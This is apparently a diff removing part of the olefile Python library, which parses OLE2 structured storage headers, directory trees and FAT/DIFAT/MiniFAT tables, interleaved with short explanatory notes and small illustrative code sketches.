- # sectors, BUT apparently some implementations set it as 0xFFFFFFFF, 1
- # or some other value so it cannot be raised as a defect in general:
- if olefile.sectorsize == 512:
- if self.sizeHigh != 0 and self.sizeHigh != 0xFFFFFFFF:
- log.debug('sectorsize=%d, sizeLow=%d, sizeHigh=%d (%X)' %
- (olefile.sectorsize, self.sizeLow, self.sizeHigh, self.sizeHigh))
- olefile._raise_defect(DEFECT_UNSURE, 'incorrect OLE stream size')
- self.size = self.sizeLow
- else:
- self.size = self.sizeLow + (long(self.sizeHigh)<<32)
- log.debug(' - size: %d (sizeLow=%d, sizeHigh=%d)' % (self.size, self.sizeLow, self.sizeHigh))
-
- self.clsid = _clsid(clsid)
- # a storage should have a null size, BUT some implementations such as
- # Word 8 for Mac seem to allow non-null values => Potential defect:
- if self.entry_type == STGTY_STORAGE and self.size != 0:
- olefile._raise_defect(DEFECT_POTENTIAL, 'OLE storage with size>0')
- # check if stream is not already referenced elsewhere:
- if self.entry_type in (STGTY_ROOT, STGTY_STREAM) and self.size>0:
- if self.size < olefile.minisectorcutoff \
- and self.entry_type==STGTY_STREAM: # only streams can be in MiniFAT
- # ministream object
- minifat = True
- else:
- minifat = False
- olefile._check_duplicate_stream(self.isectStart, minifat)
-
-
-
- def build_storage_tree(self):
- """
- Read and build the red-black tree attached to this OleDirectoryEntry
- object, if it is a storage.
- Note that this method builds a tree of all subentries, so it should
- only be called for the root object once.
- """
- log.debug('build_storage_tree: SID=%d - %s - sid_child=%d'
- % (self.sid, repr(self.name), self.sid_child))
- if self.sid_child != NOSTREAM:
- # if child SID is not NOSTREAM, then this entry is a storage.
- # Let's walk through the tree of children to fill the kids list:
- self.append_kids(self.sid_child)
-
- # Note from OpenOffice documentation: the safest way is to
- # recreate the tree because some implementations may store broken
- # red-black trees...
-
- # in the OLE file, entries are sorted on (length, name).
- # for convenience, we sort them on name instead:
- # (see rich comparison methods in this class)
- self.kids.sort()
-
-
- def append_kids(self, child_sid):
- """
- Walk through red-black tree of children of this directory entry to add
- all of them to the kids list. (recursive method)
-
- :param child_sid: index of child directory entry to use, or None when called
- first time for the root. (only used during recursion)
- """
- log.debug('append_kids: child_sid=%d' % child_sid)
- #[PL] this method was added to use simple recursion instead of a complex
- # algorithm.
- # if this is not a storage or a leaf of the tree, nothing to do:
- if child_sid == NOSTREAM:
- return
- # check if child SID is in the proper range:
- if child_sid<0 or child_sid>=len(self.olefile.direntries):
- self.olefile._raise_defect(DEFECT_INCORRECT, 'OLE DirEntry index out of range')
- else:
- # get child direntry:
- child = self.olefile._load_direntry(child_sid) #direntries[child_sid]
- log.debug('append_kids: child_sid=%d - %s - sid_left=%d, sid_right=%d, sid_child=%d'
- % (child.sid, repr(child.name), child.sid_left, child.sid_right, child.sid_child))
- # the directory entries are organized as a red-black tree.
- # (cf. Wikipedia for details)
- # First walk through left side of the tree:
- self.append_kids(child.sid_left)
- # Check if its name is not already used (case-insensitive):
- name_lower = child.name.lower()
- if name_lower in self.kids_dict:
- self.olefile._raise_defect(DEFECT_INCORRECT,
- "Duplicate filename in OLE storage")
- # Then the child_sid OleDirectoryEntry object is appended to the
- # kids list and dictionary:
- self.kids.append(child)
- self.kids_dict[name_lower] = child
- # Check if kid was not already referenced in a storage:
- if child.used:
- self.olefile._raise_defect(DEFECT_INCORRECT,
- 'OLE Entry referenced more than once')
- child.used = True
- # Finally walk through right side of the tree:
- self.append_kids(child.sid_right)
- # Afterwards build kid's own tree if it's also a storage:
- child.build_storage_tree()
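The recursion in `append_kids` is a plain in-order traversal of the sibling tree: left subtree, the node itself, right subtree. A toy sketch with a fabricated entry table (indices and names are illustrative only):

```python
NOSTREAM = 0xFFFFFFFF  # sentinel for "no sibling", as in the OLE directory

# entries: sid -> (name, sid_left, sid_right); the storage's child points at sid 1
entries = {
    1: ('b', 0, 2),
    0: ('a', NOSTREAM, NOSTREAM),
    2: ('c', NOSTREAM, NOSTREAM),
}

def inorder(sid, out):
    # Walk left subtree, visit node, walk right subtree (cf. append_kids)
    if sid == NOSTREAM:
        return
    name, left, right = entries[sid]
    inorder(left, out)
    out.append(name)
    inorder(right, out)

names = []
inorder(1, names)
print(names)  # ['a', 'b', 'c'] -- sorted order, as the red-black tree guarantees
```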
-
-
- def __eq__(self, other):
- "Compare entries by name"
- return self.name == other.name
-
- def __lt__(self, other):
- "Compare entries by name"
- return self.name < other.name
-
- def __ne__(self, other):
- return not self.__eq__(other)
-
- def __le__(self, other):
- return self.__eq__(other) or self.__lt__(other)
-
- # Reflected __lt__() and __le__() will be used for __gt__() and __ge__()
-
- #TODO: replace by the same function as MS implementation ?
- # (order by name length first, then case-insensitive order)
-
-
- def dump(self, tab = 0):
- "Dump this entry, and all its subentries (for debug purposes only)"
- TYPES = ["(invalid)", "(storage)", "(stream)", "(lockbytes)",
- "(property)", "(root)"]
- print(" "*tab + repr(self.name), TYPES[self.entry_type], end=' ')
- if self.entry_type in (STGTY_STREAM, STGTY_ROOT):
- print(self.size, "bytes", end=' ')
- print()
- if self.entry_type in (STGTY_STORAGE, STGTY_ROOT) and self.clsid:
- print(" "*tab + "{%s}" % self.clsid)
-
- for kid in self.kids:
- kid.dump(tab + 2)
-
-
- def getmtime(self):
- """
- Return modification time of a directory entry.
-
- :returns: None if modification time is null, a python datetime object
- otherwise (UTC timezone)
-
- new in version 0.26
- """
- if self.modifyTime == 0:
- return None
- return filetime2datetime(self.modifyTime)
-
-
- def getctime(self):
- """
- Return creation time of a directory entry.
-
-        :returns: None if creation time is null, a python datetime object
-            otherwise (UTC timezone)
-
- new in version 0.26
- """
- if self.createTime == 0:
- return None
- return filetime2datetime(self.createTime)
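Both timestamp getters rely on `filetime2datetime`, which converts a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC) to a `datetime`. A standalone sketch of that conversion (the function name here is illustrative, not olefile's):

```python
from datetime import datetime, timedelta

def filetime_to_datetime(ft):
    # FILETIME counts 100 ns ticks since the 1601-01-01 epoch;
    # 10 ticks = 1 microsecond, which timedelta can represent exactly.
    return datetime(1601, 1, 1) + timedelta(microseconds=ft // 10)

# 2020-01-01 00:00:00 UTC expressed as FILETIME ticks:
ticks = (datetime(2020, 1, 1) - datetime(1601, 1, 1)) // timedelta(microseconds=1) * 10
print(filetime_to_datetime(ticks))
```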
-
-
-#--- OleFileIO ----------------------------------------------------------------
-
-class OleFileIO:
- """
- OLE container object
-
- This class encapsulates the interface to an OLE 2 structured
- storage file. Use the listdir and openstream methods to
- access the contents of this file.
-
- Object names are given as a list of strings, one for each subentry
- level. The root entry should be omitted. For example, the following
- code extracts all image streams from a Microsoft Image Composer file::
-
- ole = OleFileIO("fan.mic")
-
- for entry in ole.listdir():
-        if entry[1:2] == ["Image"]:
- fin = ole.openstream(entry)
-                fout = open(entry[0], "wb")
- while True:
- s = fin.read(8192)
- if not s:
- break
- fout.write(s)
-
- You can use the viewer application provided with the Python Imaging
- Library to view the resulting files (which happens to be standard
- TIFF files).
- """
-
- def __init__(self, filename=None, raise_defects=DEFECT_FATAL,
- write_mode=False, debug=False, path_encoding=DEFAULT_PATH_ENCODING):
- """
- Constructor for the OleFileIO class.
-
- :param filename: file to open.
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read, seek and tell methods),
- it is parsed as-is.
-
- :param raise_defects: minimal level for defects to be raised as exceptions.
- (use DEFECT_FATAL for a typical application, DEFECT_INCORRECT for a
- security-oriented application, see source code for details)
-
- :param write_mode: bool, if True the file is opened in read/write mode instead
- of read-only by default.
-
- :param debug: bool, set debug mode (deprecated, not used anymore)
-
- :param path_encoding: None or str, name of the codec to use for path
- names (streams and storages), or None for Unicode.
- Unicode by default on Python 3+, UTF-8 on Python 2.x.
- (new in olefile 0.42, was hardcoded to Latin-1 until olefile v0.41)
- """
- # minimal level for defects to be raised as exceptions:
- self._raise_defects_level = raise_defects
- #: list of defects/issues not raised as exceptions:
- #: tuples of (exception type, message)
- self.parsing_issues = []
- self.write_mode = write_mode
- self.path_encoding = path_encoding
- self._filesize = None
- self.fp = None
- if filename:
- self.open(filename, write_mode=write_mode)
-
-
- def _raise_defect(self, defect_level, message, exception_type=IOError):
- """
- This method should be called for any defect found during file parsing.
- It may raise an IOError exception according to the minimal level chosen
- for the OleFileIO object.
-
- :param defect_level: defect level, possible values are:
-
- - DEFECT_UNSURE : a case which looks weird, but not sure it's a defect
- - DEFECT_POTENTIAL : a potential defect
- - DEFECT_INCORRECT : an error according to specifications, but parsing can go on
- - DEFECT_FATAL : an error which cannot be ignored, parsing is impossible
-
- :param message: string describing the defect, used with raised exception.
- :param exception_type: exception class to be raised, IOError by default
- """
- # added by [PL]
- if defect_level >= self._raise_defects_level:
- log.error(message)
- raise exception_type(message)
- else:
- # just record the issue, no exception raised:
- self.parsing_issues.append((exception_type, message))
- log.warning(message)
-
-
- def _decode_utf16_str(self, utf16_str, errors='replace'):
- """
- Decode a string encoded in UTF-16 LE format, as found in the OLE
- directory or in property streams. Return a string encoded
- according to the path_encoding specified for the OleFileIO object.
-
- :param utf16_str: bytes string encoded in UTF-16 LE format
- :param errors: str, see python documentation for str.decode()
- :return: str, encoded according to path_encoding
- """
- unicode_str = utf16_str.decode('UTF-16LE', errors)
- if self.path_encoding:
- # an encoding has been specified for path names:
- return unicode_str.encode(self.path_encoding, errors)
- else:
- # path_encoding=None, return the Unicode string as-is:
- return unicode_str
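As `_decode_utf16_str` shows, stream and storage names live in the directory as UTF-16LE with a terminating null. A minimal sketch (the sample name is a real convention for property streams; the trimming logic here is simplified):

```python
# Property stream names start with a control character, e.g. \x05:
raw = '\x05SummaryInformation\x00'.encode('utf-16-le')

# Decode and drop the trailing null, as the directory parser does:
name = raw.decode('utf-16-le', 'replace').rstrip('\x00')
print(repr(name))
```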
-
-
- def open(self, filename, write_mode=False):
- """
- Open an OLE2 file in read-only or read/write mode.
- Read and parse the header, FAT and directory.
-
- :param filename: string-like or file-like object, OLE file to parse
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read, seek and tell methods),
- it is parsed as-is.
-
- :param write_mode: bool, if True the file is opened in read/write mode instead
- of read-only by default. (ignored if filename is not a path)
- """
- self.write_mode = write_mode
- #[PL] check if filename is a string-like or file-like object:
- # (it is better to check for a read() method)
- if hasattr(filename, 'read'):
- #TODO: also check seek and tell methods?
- # file-like object: use it directly
- self.fp = filename
- elif isinstance(filename, bytes) and len(filename) >= MINIMAL_OLEFILE_SIZE:
- # filename is a bytes string containing the OLE file to be parsed:
- # convert it to BytesIO
- self.fp = io.BytesIO(filename)
- else:
- # string-like object: filename of file on disk
- if self.write_mode:
- # open file in mode 'read with update, binary'
- # According to https://docs.python.org/2/library/functions.html#open
- # 'w' would truncate the file, 'a' may only append on some Unixes
- mode = 'r+b'
- else:
- # read-only mode by default
- mode = 'rb'
- self.fp = open(filename, mode)
- # obtain the filesize by using seek and tell, which should work on most
- # file-like objects:
- #TODO: do it above, using getsize with filename when possible?
- #TODO: fix code to fail with clear exception when filesize cannot be obtained
- filesize=0
- self.fp.seek(0, os.SEEK_END)
- try:
- filesize = self.fp.tell()
- finally:
- self.fp.seek(0)
- self._filesize = filesize
- log.debug('File size: %d bytes (%Xh)' % (self._filesize, self._filesize))
-
- # lists of streams in FAT and MiniFAT, to detect duplicate references
- # (list of indexes of first sectors of each stream)
- self._used_streams_fat = []
- self._used_streams_minifat = []
-
- header = self.fp.read(512)
-
- if len(header) != 512 or header[:8] != MAGIC:
- log.debug('Magic = %r instead of %r' % (header[:8], MAGIC))
- self._raise_defect(DEFECT_FATAL, "not an OLE2 structured storage file")
-
- # [PL] header structure according to AAF specifications:
- ##Header
- ##struct StructuredStorageHeader { // [offset from start (bytes), length (bytes)]
- ##BYTE _abSig[8]; // [00H,08] {0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1,
- ## // 0x1a, 0xe1} for current version
- ##CLSID _clsid; // [08H,16] reserved must be zero (WriteClassStg/
- ## // GetClassFile uses root directory class id)
- ##USHORT _uMinorVersion; // [18H,02] minor version of the format: 33 is
- ## // written by reference implementation
- ##USHORT _uDllVersion; // [1AH,02] major version of the dll/format: 3 for
- ## // 512-byte sectors, 4 for 4 KB sectors
- ##USHORT _uByteOrder; // [1CH,02] 0xFFFE: indicates Intel byte-ordering
- ##USHORT _uSectorShift; // [1EH,02] size of sectors in power-of-two;
- ## // typically 9 indicating 512-byte sectors
- ##USHORT _uMiniSectorShift; // [20H,02] size of mini-sectors in power-of-two;
- ## // typically 6 indicating 64-byte mini-sectors
- ##USHORT _usReserved; // [22H,02] reserved, must be zero
- ##ULONG _ulReserved1; // [24H,04] reserved, must be zero
- ##FSINDEX _csectDir; // [28H,04] must be zero for 512-byte sectors,
- ## // number of SECTs in directory chain for 4 KB
- ## // sectors
- ##FSINDEX _csectFat; // [2CH,04] number of SECTs in the FAT chain
- ##SECT _sectDirStart; // [30H,04] first SECT in the directory chain
- ##DFSIGNATURE _signature; // [34H,04] signature used for transactions; must
- ## // be zero. The reference implementation
- ## // does not support transactions
- ##ULONG _ulMiniSectorCutoff; // [38H,04] maximum size for a mini stream;
- ## // typically 4096 bytes
- ##SECT _sectMiniFatStart; // [3CH,04] first SECT in the MiniFAT chain
- ##FSINDEX _csectMiniFat; // [40H,04] number of SECTs in the MiniFAT chain
- ##SECT _sectDifStart; // [44H,04] first SECT in the DIFAT chain
- ##FSINDEX _csectDif; // [48H,04] number of SECTs in the DIFAT chain
- ##SECT _sectFat[109]; // [4CH,436] the SECTs of first 109 FAT sectors
- ##};
-
- # [PL] header decoding:
- # '<' indicates little-endian byte ordering for Intel (cf. struct module help)
- fmt_header = '<8s16sHHHHHHLLLLLLLLLL'
- header_size = struct.calcsize(fmt_header)
- log.debug( "fmt_header size = %d, +FAT = %d" % (header_size, header_size + 109*4) )
- header1 = header[:header_size]
- (
- self.header_signature,
- self.header_clsid,
- self.minor_version,
- self.dll_version,
- self.byte_order,
- self.sector_shift,
- self.mini_sector_shift,
- self.reserved1,
- self.reserved2,
- self.num_dir_sectors,
- self.num_fat_sectors,
- self.first_dir_sector,
- self.transaction_signature_number,
- self.mini_stream_cutoff_size,
- self.first_mini_fat_sector,
- self.num_mini_fat_sectors,
- self.first_difat_sector,
- self.num_difat_sectors
- ) = struct.unpack(fmt_header, header1)
- log.debug( struct.unpack(fmt_header, header1))
-
- if self.header_signature != MAGIC:
- # OLE signature should always be present
- self._raise_defect(DEFECT_FATAL, "incorrect OLE signature")
- if self.header_clsid != bytearray(16):
- # according to AAF specs, CLSID should always be zero
- self._raise_defect(DEFECT_INCORRECT, "incorrect CLSID in OLE header")
- log.debug( "Minor Version = %d" % self.minor_version )
- # TODO: according to MS-CFB, minor version should be 0x003E
- log.debug( "DLL Version = %d (expected: 3 or 4)" % self.dll_version )
- if self.dll_version not in [3, 4]:
- # version 3: usual format, 512 bytes per sector
- # version 4: large format, 4K per sector
- self._raise_defect(DEFECT_INCORRECT, "incorrect DllVersion in OLE header")
- log.debug( "Byte Order = %X (expected: FFFE)" % self.byte_order )
- if self.byte_order != 0xFFFE:
- # For now only common little-endian documents are handled correctly
- self._raise_defect(DEFECT_INCORRECT, "incorrect ByteOrder in OLE header")
- # TODO: add big-endian support for documents created on Mac ?
-        # But according to [MS-CFB] v20140502, ByteOrder MUST be 0xFFFE.
- self.sector_size = 2**self.sector_shift
- log.debug( "Sector Size = %d bytes (expected: 512 or 4096)" % self.sector_size )
- if self.sector_size not in [512, 4096]:
- self._raise_defect(DEFECT_INCORRECT, "incorrect sector_size in OLE header")
- if (self.dll_version==3 and self.sector_size!=512) \
- or (self.dll_version==4 and self.sector_size!=4096):
- self._raise_defect(DEFECT_INCORRECT, "sector_size does not match DllVersion in OLE header")
- self.mini_sector_size = 2**self.mini_sector_shift
- log.debug( "MiniFAT Sector Size = %d bytes (expected: 64)" % self.mini_sector_size )
- if self.mini_sector_size not in [64]:
- self._raise_defect(DEFECT_INCORRECT, "incorrect mini_sector_size in OLE header")
- if self.reserved1 != 0 or self.reserved2 != 0:
- self._raise_defect(DEFECT_INCORRECT, "incorrect OLE header (non-null reserved bytes)")
- log.debug( "Number of Directory sectors = %d" % self.num_dir_sectors )
- # Number of directory sectors (only allowed if DllVersion != 3)
- if self.sector_size==512 and self.num_dir_sectors!=0:
- self._raise_defect(DEFECT_INCORRECT, "incorrect number of directory sectors in OLE header")
- log.debug( "Number of FAT sectors = %d" % self.num_fat_sectors )
- # num_fat_sectors = number of FAT sectors in the file
- log.debug( "First Directory sector = %Xh" % self.first_dir_sector )
- # first_dir_sector = 1st sector containing the directory
- log.debug( "Transaction Signature Number = %d" % self.transaction_signature_number )
- # Signature should be zero, BUT some implementations do not follow this
- # rule => only a potential defect:
- # (according to MS-CFB, may be != 0 for applications supporting file
- # transactions)
- if self.transaction_signature_number != 0:
- self._raise_defect(DEFECT_POTENTIAL, "incorrect OLE header (transaction_signature_number>0)")
- log.debug( "Mini Stream cutoff size = %Xh (expected: 1000h)" % self.mini_stream_cutoff_size )
- # MS-CFB: This integer field MUST be set to 0x00001000. This field
- # specifies the maximum size of a user-defined data stream allocated
- # from the mini FAT and mini stream, and that cutoff is 4096 bytes.
- # Any user-defined data stream larger than or equal to this cutoff size
- # must be allocated as normal sectors from the FAT.
- if self.mini_stream_cutoff_size != 0x1000:
- self._raise_defect(DEFECT_INCORRECT, "incorrect mini_stream_cutoff_size in OLE header")
- # if no exception is raised, the cutoff size is fixed to 0x1000
- log.warning('Fixing the mini_stream_cutoff_size to 4096 (mandatory value) instead of %d' %
- self.mini_stream_cutoff_size)
- self.mini_stream_cutoff_size = 0x1000
- # TODO: check if these values are OK
- log.debug( "First MiniFAT sector = %Xh" % self.first_mini_fat_sector )
- log.debug( "Number of MiniFAT sectors = %d" % self.num_mini_fat_sectors )
- log.debug( "First DIFAT sector = %Xh" % self.first_difat_sector )
- log.debug( "Number of DIFAT sectors = %d" % self.num_difat_sectors )
-
- # calculate the number of sectors in the file
- # (-1 because header doesn't count)
- self.nb_sect = ( (filesize + self.sector_size-1) // self.sector_size) - 1
- log.debug( "Maximum number of sectors in the file: %d (%Xh)" % (self.nb_sect, self.nb_sect))
- #TODO: change this test, because an OLE file MAY contain other data
- # after the last sector.
-
- # file clsid
- self.header_clsid = _clsid(header[8:24])
-
- #TODO: remove redundant attributes, and fix the code which uses them?
- self.sectorsize = self.sector_size #1 << i16(header, 30)
- self.minisectorsize = self.mini_sector_size #1 << i16(header, 32)
- self.minisectorcutoff = self.mini_stream_cutoff_size # i32(header, 56)
-
- # check known streams for duplicate references (these are always in FAT,
- # never in MiniFAT):
- self._check_duplicate_stream(self.first_dir_sector)
- # check MiniFAT only if it is not empty:
- if self.num_mini_fat_sectors:
- self._check_duplicate_stream(self.first_mini_fat_sector)
- # check DIFAT only if it is not empty:
- if self.num_difat_sectors:
- self._check_duplicate_stream(self.first_difat_sector)
-
- # Load file allocation tables
- self.loadfat(header)
- # Load directory. This sets both the direntries list (ordered by sid)
- # and the root (ordered by hierarchy) members.
- self.loaddirectory(self.first_dir_sector)
- self.ministream = None
- self.minifatsect = self.first_mini_fat_sector
-
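The header decoding in `open()` above is a single `struct.unpack` with the documented format string. A synthetic round-trip, under assumptions: the header bytes are fabricated (version 3, 512-byte sectors), but `fmt_header` and the field order match the deleted code.

```python
import struct

MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'
fmt_header = '<8s16sHHHHHHLLLLLLLLLL'  # 76 bytes, as in OleFileIO.open()

# Craft a minimal plausible header: DLL version 3 -> 512-byte sectors.
header = struct.pack(fmt_header,
                     MAGIC, b'\x00' * 16,  # signature, zero CLSID
                     0x3E,        # minor version
                     3,           # DLL version (3 = 512-byte sectors)
                     0xFFFE,      # little-endian marker
                     9,           # sector shift: 2**9 = 512
                     6,           # mini sector shift: 2**6 = 64
                     0, 0, 0,     # reserved1, reserved2, num dir sectors
                     1,           # num FAT sectors
                     1,           # first directory sector
                     0,           # transaction signature
                     0x1000,      # mini stream cutoff (mandatory 4096)
                     2, 1,        # first MiniFAT sector, MiniFAT sector count
                     0xFFFFFFFE,  # first DIFAT sector: ENDOFCHAIN (none)
                     0)           # num DIFAT sectors
parsed = struct.unpack(fmt_header, header)
print(2 ** parsed[5], 2 ** parsed[6])  # sector sizes: 512 64
```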
-
- def close(self):
- """
- close the OLE file, to release the file object
- """
- self.fp.close()
-
-
- def _check_duplicate_stream(self, first_sect, minifat=False):
- """
- Checks if a stream has not been already referenced elsewhere.
- This method should only be called once for each known stream, and only
- if stream size is not null.
-
- :param first_sect: int, index of first sector of the stream in FAT
- :param minifat: bool, if True, stream is located in the MiniFAT, else in the FAT
- """
- if minifat:
- log.debug('_check_duplicate_stream: sect=%Xh in MiniFAT' % first_sect)
- used_streams = self._used_streams_minifat
- else:
- log.debug('_check_duplicate_stream: sect=%Xh in FAT' % first_sect)
- # some values can be safely ignored (not a real stream):
- if first_sect in (DIFSECT,FATSECT,ENDOFCHAIN,FREESECT):
- return
- used_streams = self._used_streams_fat
- #TODO: would it be more efficient using a dict or hash values, instead
- # of a list of long ?
- if first_sect in used_streams:
- self._raise_defect(DEFECT_INCORRECT, 'Stream referenced twice')
- else:
- used_streams.append(first_sect)
-
-
- def dumpfat(self, fat, firstindex=0):
- """
- Display a part of FAT in human-readable form for debugging purposes
- """
- # dictionary to convert special FAT values in human-readable strings
- VPL = 8 # values per line (8+1 * 8+1 = 81)
- fatnames = {
- FREESECT: "..free..",
- ENDOFCHAIN: "[ END. ]",
- FATSECT: "FATSECT ",
- DIFSECT: "DIFSECT "
- }
- nbsect = len(fat)
- nlines = (nbsect+VPL-1)//VPL
- print("index", end=" ")
- for i in range(VPL):
- print("%8X" % i, end=" ")
- print()
- for l in range(nlines):
- index = l*VPL
- print("%6X:" % (firstindex+index), end=" ")
- for i in range(index, index+VPL):
- if i>=nbsect:
- break
- sect = fat[i]
- aux = sect & 0xFFFFFFFF # JYTHON-WORKAROUND
- if aux in fatnames:
- name = fatnames[aux]
- else:
- if sect == i+1:
- name = " --->"
- else:
- name = "%8X" % sect
- print(name, end=" ")
- print()
-
-
- def dumpsect(self, sector, firstindex=0):
- """
- Display a sector in a human-readable form, for debugging purposes
- """
- VPL=8 # number of values per line (8+1 * 8+1 = 81)
- tab = array.array(UINT32, sector)
- if sys.byteorder == 'big':
- tab.byteswap()
- nbsect = len(tab)
- nlines = (nbsect+VPL-1)//VPL
- print("index", end=" ")
- for i in range(VPL):
- print("%8X" % i, end=" ")
- print()
- for l in range(nlines):
- index = l*VPL
- print("%6X:" % (firstindex+index), end=" ")
- for i in range(index, index+VPL):
- if i>=nbsect:
- break
- sect = tab[i]
- name = "%8X" % sect
- print(name, end=" ")
- print()
-
- def sect2array(self, sect):
- """
- convert a sector to an array of 32 bits unsigned integers,
- swapping bytes on big endian CPUs such as PowerPC (old Macs)
- """
- a = array.array(UINT32, sect)
- # if CPU is big endian, swap bytes:
- if sys.byteorder == 'big':
- a.byteswap()
- return a
-
-
- def loadfat_sect(self, sect):
- """
- Adds the indexes of the given sector to the FAT
-
- :param sect: string containing the first FAT sector, or array of long integers
- :returns: index of last FAT sector.
- """
- # a FAT sector is an array of ulong integers.
- if isinstance(sect, array.array):
- # if sect is already an array it is directly used
- fat1 = sect
- else:
- # if it's a raw sector, it is parsed in an array
- fat1 = self.sect2array(sect)
- # Display the sector contents only if the logging level is debug:
- if log.isEnabledFor(logging.DEBUG):
- self.dumpsect(sect)
- # The FAT is a sector chain starting at the first index of itself.
- # initialize isect, just in case:
- isect = None
- for isect in fat1:
- isect = isect & 0xFFFFFFFF # JYTHON-WORKAROUND
- log.debug("isect = %X" % isect)
- if isect == ENDOFCHAIN or isect == FREESECT:
- # the end of the sector chain has been reached
- log.debug("found end of sector chain")
- break
- # read the FAT sector
- s = self.getsect(isect)
- # parse it as an array of 32 bits integers, and add it to the
- # global FAT array
- nextfat = self.sect2array(s)
- self.fat = self.fat + nextfat
- return isect
-
-
- def loadfat(self, header):
- """
- Load the FAT table.
- """
- # The 1st sector of the file contains sector numbers for the first 109
- # FAT sectors, right after the header which is 76 bytes long.
- # (always 109, whatever the sector size: 512 bytes = 76+4*109)
- # Additional sectors are described by DIF blocks
-
- log.debug('Loading the FAT table, starting with the 1st sector after the header')
- sect = header[76:512]
- log.debug( "len(sect)=%d, so %d integers" % (len(sect), len(sect)//4) )
- #fat = []
- # [PL] FAT is an array of 32 bits unsigned ints, it's more effective
- # to use an array than a list in Python.
- # It's initialized as empty first:
- self.fat = array.array(UINT32)
- self.loadfat_sect(sect)
- #self.dumpfat(self.fat)
-## for i in range(0, len(sect), 4):
-## ix = i32(sect, i)
-## #[PL] if ix == -2 or ix == -1: # ix == 0xFFFFFFFE or ix == 0xFFFFFFFF:
-## if ix == 0xFFFFFFFE or ix == 0xFFFFFFFF:
-## break
-## s = self.getsect(ix)
-## #fat = fat + [i32(s, i) for i in range(0, len(s), 4)]
-## fat = fat + array.array(UINT32, s)
- if self.num_difat_sectors != 0:
- log.debug('DIFAT is used, because file size > 6.8MB.')
- # [PL] There's a DIFAT because file is larger than 6.8MB
- # some checks just in case:
- if self.num_fat_sectors <= 109:
- # there must be at least 109 blocks in header and the rest in
- # DIFAT, so number of sectors must be >109.
- self._raise_defect(DEFECT_INCORRECT, 'incorrect DIFAT, not enough sectors')
- if self.first_difat_sector >= self.nb_sect:
- # initial DIFAT block index must be valid
- self._raise_defect(DEFECT_FATAL, 'incorrect DIFAT, first index out of range')
- log.debug( "DIFAT analysis..." )
- # We compute the necessary number of DIFAT sectors :
- # Number of pointers per DIFAT sector = (sectorsize/4)-1
- # (-1 because the last pointer is the next DIFAT sector number)
- nb_difat_sectors = (self.sectorsize//4)-1
- # (if 512 bytes: each DIFAT sector = 127 pointers + 1 towards next DIFAT sector)
- nb_difat = (self.num_fat_sectors-109 + nb_difat_sectors-1)//nb_difat_sectors
- log.debug( "nb_difat = %d" % nb_difat )
- if self.num_difat_sectors != nb_difat:
- raise IOError('incorrect DIFAT')
- isect_difat = self.first_difat_sector
- for i in iterrange(nb_difat):
- log.debug( "DIFAT block %d, sector %X" % (i, isect_difat) )
- #TODO: check if corresponding FAT SID = DIFSECT
- sector_difat = self.getsect(isect_difat)
- difat = self.sect2array(sector_difat)
- # Display the sector contents only if the logging level is debug:
- if log.isEnabledFor(logging.DEBUG):
- self.dumpsect(sector_difat)
- self.loadfat_sect(difat[:nb_difat_sectors])
- # last DIFAT pointer is next DIFAT sector:
- isect_difat = difat[nb_difat_sectors]
- log.debug( "next DIFAT sector: %X" % isect_difat )
- # checks:
- if isect_difat not in [ENDOFCHAIN, FREESECT]:
- # last DIFAT pointer value must be ENDOFCHAIN or FREESECT
- raise IOError('incorrect end of DIFAT')
-## if len(self.fat) != self.num_fat_sectors:
-## # FAT should contain num_fat_sectors blocks
-## print("FAT length: %d instead of %d" % (len(self.fat), self.num_fat_sectors))
-## raise IOError('incorrect DIFAT')
- else:
- log.debug('No DIFAT, because file size < 6.8MB.')
- # since FAT is read from fixed-size sectors, it may contain more values
- # than the actual number of sectors in the file.
- # Keep only the relevant sector indexes:
- if len(self.fat) > self.nb_sect:
- log.debug('len(fat)=%d, shrunk to nb_sect=%d' % (len(self.fat), self.nb_sect))
- self.fat = self.fat[:self.nb_sect]
- log.debug('FAT references %d sectors / Maximum %d sectors in file' % (len(self.fat), self.nb_sect))
- # Display the FAT contents only if the logging level is debug:
- if log.isEnabledFor(logging.DEBUG):
- log.debug('\nFAT:')
- self.dumpfat(self.fat)
-
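The DIFAT sizing arithmetic in `loadfat` above can be checked in isolation (a sketch with illustrative numbers, not part of the olefile API; the `max(..., 0)` clamp is an addition for safety here):

```python
def count_difat_sectors(num_fat_sectors, sectorsize=512):
    # Each DIFAT sector holds (sectorsize/4)-1 FAT sector pointers;
    # the last 32-bit slot points to the next DIFAT sector.
    pointers_per_difat = (sectorsize // 4) - 1   # 127 for 512-byte sectors
    # The header itself holds the first 109 FAT sector numbers,
    # so only the remainder needs DIFAT sectors (rounded up):
    extra = max(num_fat_sectors - 109, 0)
    return (extra + pointers_per_difat - 1) // pointers_per_difat

print(count_difat_sectors(109))   # 0 -> no DIFAT needed (file <= ~6.8MB)
print(count_difat_sectors(236))   # 1 -> 127 extra FAT sectors fill one DIFAT sector
print(count_difat_sectors(237))   # 2
```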
-
- def loadminifat(self):
- """
- Load the MiniFAT table.
- """
- # MiniFAT is stored in a standard sub-stream, pointed to by a header
- # field.
- # NOTE: there are two sizes to take into account for this stream:
- # 1) Stream size is calculated according to the number of sectors
- # declared in the OLE header. This allocated stream may be more than
- # needed to store the actual sector indexes.
- # (self.num_mini_fat_sectors is the number of sectors of size self.sector_size)
- stream_size = self.num_mini_fat_sectors * self.sector_size
- # 2) Actually used size is calculated by dividing the MiniStream size
- # (given by root entry size) by the size of mini sectors, *4 for
- # 32 bits indexes:
- nb_minisectors = (self.root.size + self.mini_sector_size-1) // self.mini_sector_size
- used_size = nb_minisectors * 4
- log.debug('loadminifat(): minifatsect=%d, nb FAT sectors=%d, used_size=%d, stream_size=%d, nb MiniSectors=%d' %
- (self.minifatsect, self.num_mini_fat_sectors, used_size, stream_size, nb_minisectors))
- if used_size > stream_size:
- # This is not really a problem, but may indicate a wrong implementation:
- self._raise_defect(DEFECT_INCORRECT, 'OLE MiniStream is larger than MiniFAT')
- # In any case, first read stream_size:
- s = self._open(self.minifatsect, stream_size, force_FAT=True).read()
